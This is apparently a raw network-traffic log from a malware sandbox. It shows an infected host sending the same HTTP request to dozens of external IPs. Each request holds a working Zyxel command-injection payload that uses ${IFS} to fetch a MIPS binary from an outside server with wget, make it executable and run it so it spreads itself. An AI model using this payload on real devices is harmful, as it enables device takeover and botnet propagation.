                                            Jan 14, 2024 15:50:53.687998056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8030192.168.2.235152460.40.101.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688018084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8031192.168.2.234551887.211.80.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688040972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8032192.168.2.2346092124.45.37.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688064098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8033192.168.2.234451084.50.106.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688081980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8034192.168.2.23433781.1.48.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688081980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8035192.168.2.233900859.236.214.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688143969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8036192.168.2.2345602213.9.72.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688184977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8037192.168.2.233532024.198.53.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688188076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8038192.168.2.2333598207.159.255.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688225031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8039192.168.2.233750453.215.163.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688239098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8040192.168.2.2333300210.46.46.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688276052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8041192.168.2.235490637.102.245.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688287020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8042192.168.2.2359276183.133.176.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688302040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8043192.168.2.236021475.229.199.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688337088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8044192.168.2.2348372138.80.224.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688340902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8045192.168.2.23438068.126.82.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688358068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8046192.168.2.2351386135.21.238.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688381910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8047192.168.2.2352022174.93.65.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688440084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8048192.168.2.234658094.87.221.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688446999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8049192.168.2.2354662221.135.225.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688462019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8050192.168.2.234312037.247.5.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688483000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8051192.168.2.2350722134.136.162.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688545942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8052192.168.2.2355686191.223.246.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688582897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8053192.168.2.235575067.8.120.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688633919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8054192.168.2.2356316196.54.228.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688657999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8055192.168.2.2357082164.11.101.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688677073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8056192.168.2.2353250125.145.237.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688703060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8057192.168.2.234281886.224.50.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688704967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8058192.168.2.233450244.147.134.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688781023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8059192.168.2.234583866.50.98.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688798904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8060192.168.2.235039287.32.233.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688816071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8061192.168.2.2344326123.201.48.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688827991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8062192.168.2.2351636177.59.111.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688847065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8063192.168.2.2346224138.46.112.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688851118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8064192.168.2.2349390217.215.243.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688880920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8065192.168.2.235148661.77.113.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688914061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8066192.168.2.23458865.93.108.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688960075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8067192.168.2.2336780117.222.182.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.688992977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8068192.168.2.2356504190.98.112.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689012051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8069192.168.2.2351146207.140.198.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689021111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8070192.168.2.2336278111.154.78.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689029932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8071192.168.2.2344652194.50.24.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689069033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8072192.168.2.2341708124.22.49.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689131021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8073192.168.2.2344244202.54.223.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689166069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8074192.168.2.2348992142.227.30.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689167976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8075192.168.2.235931873.4.195.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689196110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8076192.168.2.2348172151.249.236.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689229965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8077192.168.2.2341852128.130.33.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689254999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8078192.168.2.234955044.77.140.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689273119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8079192.168.2.234093820.26.135.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689306021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8080192.168.2.235157653.36.178.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689340115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8081192.168.2.2334452218.238.24.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689388990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8082192.168.2.2360652178.159.247.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689399004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8083192.168.2.2341636109.194.141.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689438105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8084192.168.2.2353318164.149.113.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689476013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8085192.168.2.2336538120.255.30.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689491034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8086192.168.2.234469261.99.66.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689533949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8087192.168.2.233724868.87.244.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689533949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8088192.168.2.2358896104.166.167.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689574957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8089192.168.2.2338656112.111.232.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689621925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8090192.168.2.2350748164.238.134.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689657927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8091192.168.2.2332778186.17.204.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689683914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8092192.168.2.233689688.87.35.164443
                                            TimestampBytes transferredDirectionData
